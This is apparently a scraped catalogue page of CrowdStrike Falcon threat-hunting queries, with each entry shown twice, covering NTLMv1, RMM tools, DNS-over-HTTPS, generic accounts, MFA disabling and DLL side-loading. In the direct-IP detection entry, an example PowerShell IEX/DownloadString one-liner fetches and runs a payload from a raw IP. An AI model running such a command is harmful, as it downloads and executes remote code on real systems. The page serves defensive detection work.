EXPLORE DETECTIONS

Detect NTLMv1 Authentications

This query detects NTLM v1 authentications using Falcon ITP telemetry. [Closing the Door on Net-NTLMv1: Releasing Rainbow Tables to Accelerate Protocol Deprecation](https://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-deprecation-rainbow-tables?linkId=38338466&hl=en)

Detect NTLMv1 Authentications

This query detects NTLM v1 authentications using Falcon ITP telemetry. [Closing the Door on Net-NTLMv1: Releasing Rainbow Tables to Accelerate Protocol Deprecation](https://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-deprecation-rainbow-tables?linkId=38338466&hl=en)

Detect NTLMv1 Authentications (Windows Event Logs)

This query detects NTLM v1 authentications using Windows Event Log telemetry. [Closing the Door on Net-NTLMv1: Releasing Rainbow Tables to Accelerate Protocol Deprecation](https://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-deprecation-rainbow-tables?linkId=38338466&hl=en)

Detect NTLMv1 Authentications (Windows Event Logs)

This query detects NTLM v1 authentications using Windows Event Log telemetry. [Closing the Door on Net-NTLMv1: Releasing Rainbow Tables to Accelerate Protocol Deprecation](https://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-deprecation-rainbow-tables?linkId=38338466&hl=en)

Detect Remote Monitoring and Management (RMM) Tools over DNS

This query identifies the presence or execution of common RMM utilities (e.g., AnyDesk, TeamViewer, ConnectWise, ScreenConnect, Splashtop). While these tools are legitimate and widely used for IT administration, adversaries often abuse them as “living-off-the-land” remote access backdoors. Because they operate under the guise of trusted software and can blend with normal activity, malicious use of RMM tools may bypass traditional security controls, enabling persistence, data exfiltration, or hands-on-keyboard attacks.

Detect Remote Monitoring and Management (RMM) Tools over DNS

This query identifies the presence or execution of common RMM utilities (e.g., AnyDesk, TeamViewer, ConnectWise, ScreenConnect, Splashtop). While these tools are legitimate and widely used for IT administration, adversaries often abuse them as “living-off-the-land” remote access backdoors. Because they operate under the guise of trusted software and can blend with normal activity, malicious use of RMM tools may bypass traditional security controls, enabling persistence, data exfiltration, or hands-on-keyboard attacks.

Detect RTR High Risk Commands

Detects the execution of high risk commands such as - get - put - memdump - xmemdump - run - put-and-run

Detect RTR High Risk Commands

Detects the execution of high risk commands such as - get - put - memdump - xmemdump - run - put-and-run

Detect Suspicious Windows Command-Line Activity Using System Utilities

The query analyzes Windows ProcessRollup2 events to identify unusual use of common administrative tools (e.g., net.exe, sc.exe, nltest.exe, systeminfo.exe). It assigns behavior weights based on command-line patterns, aggregates activity per host and hour, flags systems with high or frequent activity, and provides direct links for host investigation in Falcon. Reference: [GitHub CrowdStrike/logscale-community](https://github.com/CrowdStrike/logscale-community-content/blob/main/Queries-Only/Helpful-CQL-Queries/Custom%20Weighting%20Command%20Line%20and%20File%20Name.md)

Detect Suspicious Windows Command-Line Activity Using System Utilities

The query analyzes Windows ProcessRollup2 events to identify unusual use of common administrative tools (e.g., net.exe, sc.exe, nltest.exe, systeminfo.exe). It assigns behavior weights based on command-line patterns, aggregates activity per host and hour, flags systems with high or frequent activity, and provides direct links for host investigation in Falcon. Reference: [GitHub CrowdStrike/logscale-community](https://github.com/CrowdStrike/logscale-community-content/blob/main/Queries-Only/Helpful-CQL-Queries/Custom%20Weighting%20Command%20Line%20and%20File%20Name.md)

Detection of DNS Requests to AI-Related Domains

This query identifies DNS requests to domains listed in the AI-Domains.csv lookup. It filters out browser-initiated traffic from Chrome and Edge. The result highlights which hosts and processes are generating the most DNS requests to those domains. The query relies on an lookup file with at least one column named Domain. The lookup provides the set of AI-related domains to check against. Without this file, the match() operator cannot resolve which DNS requests should be considered relevant. **Example** |Domain |--- |chat.openai.com |chatgpt.com |openai.com |claude.ai |anthropic.com |bard.google.com |*.ai |*.openai.com

Detection of DNS Requests to AI-Related Domains

This query identifies DNS requests to domains listed in the AI-Domains.csv lookup. It filters out browser-initiated traffic from Chrome and Edge. The result highlights which hosts and processes are generating the most DNS requests to those domains. The query relies on an lookup file with at least one column named Domain. The lookup provides the set of AI-related domains to check against. Without this file, the match() operator cannot resolve which DNS requests should be considered relevant. **Example** |Domain |--- |chat.openai.com |chatgpt.com |openai.com |claude.ai |anthropic.com |bard.google.com |*.ai |*.openai.com

Detection of DoH traffic to known DoH-providers

This query identifies network traffic to well-known DoH endpoints (e.g., Cloudflare, Google, Quad9, Mozilla). DoH encrypts DNS requests inside HTTPS, which enhances privacy but creates blind spots for defenders. Adversaries can exploit DoH to bypass DNS-based filtering, hide access to phishing domains, establish stealthy command-and-control channels, or exfiltrate data without triggering traditional DNS logs. Monitoring and alerting on DoH connections helps restore visibility into DNS activity—one of the most critical layers of network defense. DNS over HTTPS (DoH) encrypts DNS queries by tunneling them through HTTPS, making them indistinguishable from regular web traffic. While this improves user privacy, it also introduces blind spots for security teams. Why it matters: - Phishing domains can be accessed without triggering DNS-based filtering. - Command-and-Control (C2) communication can blend into normal HTTPS traffic. - Data exfiltration becomes harder to detect as destination domains are hidden. Impact on organizations: Without proper monitoring or controls, DoH can undermine DNS visibility—one of the most critical layers in network security—allowing threats to go unnoticed.

Detection of DoH traffic to known DoH-providers

This query identifies network traffic to well-known DoH endpoints (e.g., Cloudflare, Google, Quad9, Mozilla). DoH encrypts DNS requests inside HTTPS, which enhances privacy but creates blind spots for defenders. Adversaries can exploit DoH to bypass DNS-based filtering, hide access to phishing domains, establish stealthy command-and-control channels, or exfiltrate data without triggering traditional DNS logs. Monitoring and alerting on DoH connections helps restore visibility into DNS activity—one of the most critical layers of network defense. DNS over HTTPS (DoH) encrypts DNS queries by tunneling them through HTTPS, making them indistinguishable from regular web traffic. While this improves user privacy, it also introduces blind spots for security teams. Why it matters: - Phishing domains can be accessed without triggering DNS-based filtering. - Command-and-Control (C2) communication can blend into normal HTTPS traffic. - Data exfiltration becomes harder to detect as destination domains are hidden. Impact on organizations: Without proper monitoring or controls, DoH can undermine DNS visibility—one of the most critical layers in network security—allowing threats to go unnoticed.

Detection of External Direct IP Usage in CommandLine Windows and Mac

Detection of External Direct IP Usage This query detects Windows processes that utilize raw public IP addresses within HTTP/HTTPS URLs in their command-line arguments (e.g., powershell -c IEX(New-Object Net.WebClient).DownloadString('http://1.2.3.4/payload')). This behavior is highly suspicious because legitimate software typically uses domain names (DNS). Attackers often use direct public IPs to host second-stage payloads or C2 servers to bypass DNS filtering and logging mechanisms. Query Description: Detection of External Direct IP Usage This query detects Windows processes that utilize raw public IP addresses within HTTP/HTTPS URLs in their command-line arguments (e.g., powershell -c IEX(New-Object Net.WebClient).DownloadString('http://1.2.3.4/payload')). This behavior is highly suspicious because legitimate software typically uses domain names (DNS). Attackers often use direct public IPs to host second-stage payloads or C2 servers to bypass DNS filtering and logging mechanisms. Key Logic Breakdown Scope & Filter: Targets Windows process creation events (ProcessRollup2). Filters for command lines containing http. Exclusions: Removes known noisy applications (e.g., Chrome, HP Click, Umbrella) to reduce false positives. Extraction (Regex): It scans the command line to extract a URL specifically formatted with an IPv4 address (e.g., http://x.x.x.x/...). It isolates the IP address from that URL into a field called Ipaddress. Public IP Validation: It uses !cidr(...) to exclude all standard private and reserved IP ranges (Localhost, 10.x, 192.168.x, 172.16.x, APIPA, etc.). This ensures the query only alerts on Public/External IPs. Formatting & Triage: It generates a clickable ExecutionSummary that includes the Parent Process, the Target Image, and the specific Command Line. It generates direct links (ProcessExplorer, GraphExplorer) to the Falcon console for immediate investigation. Aggregation: The results are grouped by ComputerName, showing how many times the event occurred and the first/last time it was seen.

Detection of External Direct IP Usage in CommandLine Windows and Mac

Detection of External Direct IP Usage This query detects Windows processes that utilize raw public IP addresses within HTTP/HTTPS URLs in their command-line arguments (e.g., powershell -c IEX(New-Object Net.WebClient).DownloadString('http://1.2.3.4/payload')). This behavior is highly suspicious because legitimate software typically uses domain names (DNS). Attackers often use direct public IPs to host second-stage payloads or C2 servers to bypass DNS filtering and logging mechanisms. Query Description: Detection of External Direct IP Usage This query detects Windows processes that utilize raw public IP addresses within HTTP/HTTPS URLs in their command-line arguments (e.g., powershell -c IEX(New-Object Net.WebClient).DownloadString('http://1.2.3.4/payload')). This behavior is highly suspicious because legitimate software typically uses domain names (DNS). Attackers often use direct public IPs to host second-stage payloads or C2 servers to bypass DNS filtering and logging mechanisms. Key Logic Breakdown Scope & Filter: Targets Windows process creation events (ProcessRollup2). Filters for command lines containing http. Exclusions: Removes known noisy applications (e.g., Chrome, HP Click, Umbrella) to reduce false positives. Extraction (Regex): It scans the command line to extract a URL specifically formatted with an IPv4 address (e.g., http://x.x.x.x/...). It isolates the IP address from that URL into a field called Ipaddress. Public IP Validation: It uses !cidr(...) to exclude all standard private and reserved IP ranges (Localhost, 10.x, 192.168.x, 172.16.x, APIPA, etc.). This ensures the query only alerts on Public/External IPs. Formatting & Triage: It generates a clickable ExecutionSummary that includes the Parent Process, the Target Image, and the specific Command Line. It generates direct links (ProcessExplorer, GraphExplorer) to the Falcon console for immediate investigation. Aggregation: The results are grouped by ComputerName, showing how many times the event occurred and the first/last time it was seen.

Detection of Generic User Account Usage

This query identifies the use of generic or shared user accounts by leveraging a predefined lookup file containing known default and non-personalized usernames (e.g., admin, test, root). | Framework | Primary Reason | Specific Source / Control | |---------------|----------------------------------|-------------------------------------| | PCI DSS | Individual Accountability | Requirement 8.2.1 | | HIPAA | Traceability of PHI Access | 45 CFR § 164.312(a)(2)(i) | | ISO 27001 | Privileged Access Control | Annex A 5.15 / 8.2 | | NIST 800-53 | Risk Management | AC-2(9) | | SOC 2 | Auditability | CC6.1 |

Detection of Generic User Account Usage

This query identifies the use of generic or shared user accounts by leveraging a predefined lookup file containing known default and non-personalized usernames (e.g., admin, test, root). | Framework | Primary Reason | Specific Source / Control | |---------------|----------------------------------|-------------------------------------| | PCI DSS | Individual Accountability | Requirement 8.2.1 | | HIPAA | Traceability of PHI Access | 45 CFR § 164.312(a)(2)(i) | | ISO 27001 | Privileged Access Control | Annex A 5.15 / 8.2 | | NIST 800-53 | Risk Management | AC-2(9) | | SOC 2 | Auditability | CC6.1 |

Device Code Sign-In

Detects authentication events using the device code flow as identified by Microsoft Defender for Identity, where a user enters a code on a separate device to complete sign‑in. While commonly used for legitimate scenarios, this method can be abused by attackers to perform phishing‑based authentication or bypass traditional sign‑in monitoring Detects authentication events using the device code flow as identified by Microsoft Defender for Identity, where a user enters a code on a separate device to complete sign‑in. While commonly used for legitimate scenarios, this method can be abused by attackers to perform phishing‑based authentication or bypass traditional sign‑in monitoring

Devices in RFM state

Devices in RFM state

Disable Strong Authentication (Microsoft Entra ID)

Detects when strong authentication methods (such as MFA) are disabled or weakened for a user account in Microsoft Entra ID. This action reduces account security and may indicate a legitimate administrative change or a potential attempt to bypass authentication controls and should be reviewed. Detects when strong authentication methods (such as MFA) are disabled or weakened for a user account in Microsoft Entra ID. This action reduces account security and may indicate a legitimate administrative change or a potential attempt to bypass authentication controls and should be reviewed.

Dll-Side Loading Detection Query

The query traces processes that write both DLL and EXE files to the same location while exhibiting masquerading behavior. Reference: [GitHub Aamir-Muhammad/CrowdStrike-Queries](https://github.com/Aamir-Muhammad/CrowdStrike-Queries/blob/main/Hunting-Queries/DLL-Side-Loading-Detection.md)

Dll-Side Loading Detection Query

The query traces processes that write both DLL and EXE files to the same location while exhibiting masquerading behavior. Reference: [GitHub Aamir-Muhammad/CrowdStrike-Queries](https://github.com/Aamir-Muhammad/CrowdStrike-Queries/blob/main/Hunting-Queries/DLL-Side-Loading-Detection.md)